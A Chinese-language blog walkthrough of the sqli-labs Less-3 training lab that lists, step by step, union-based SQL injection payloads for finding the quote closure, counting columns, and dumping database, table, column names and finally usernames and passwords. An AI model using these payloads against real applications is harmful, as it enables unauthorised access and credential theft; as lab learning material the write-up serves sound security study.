SQL注入实例(sqli-labs/less-3)

0、初始页面

1、确定闭合字符

确定为字符型注入

?id=1 and 1=1 
?id=1 and 1=2

确定闭合字符为 ')

?id=1'
?id=1')

2、确定表的列数

确定查询表的列数为3

?id=1') order by 3 --+

3、确定回显位置

确定回显位置为第二列和第三列

?id=-1') union select 1,2,3 --+

4、爆库名

当前所在数据库为security

?id=-1') union select 1,user(),database() --+

5、爆表名

查看users表

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'security' --+

6、爆列名

?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users' --+

7、显示最终结果

?id=-1%27) union select 1,2,group_concat(username,0x3a,password) from security.users --+
相关推荐
我们的五年12 分钟前
MySQL存储引擎:选择与应用
数据库·mysql
带娃的IT创业者44 分钟前
《Python实战进阶》专栏 No.3:Django 项目结构解析与入门DEMO
数据库·python·django
人间打气筒(Ada)1 小时前
MySQL优化
数据库·mysql
小蒜学长2 小时前
医疗报销系统的设计与实现(代码+数据库+LW)
数据库·spring boot·学习·oracle·课程设计
终端行者2 小时前
kubernetes1.28部署mysql5.7主从同步,使用Nfs制作持久卷存储,适用于centos7/9操作系统,
数据库·容器·kubernetes
羊小猪~~2 小时前
MYSQL学习笔记(九):MYSQL表的“增删改查”
数据库·笔记·后端·sql·学习·mysql·考研
我们的五年2 小时前
MySQL 架构
数据库·mysql·开源
橘猫云计算机设计2 小时前
基于SSM的《计算机网络》题库管理系统(源码+lw+部署文档+讲解),源码可白嫖!
java·数据库·spring boot·后端·python·计算机网络·毕设
ok0603 小时前
oracle怎么创建定时任务
数据库·oracle
阿桢呀3 小时前
Redis实战篇《黑马点评》5
数据库·redis·缓存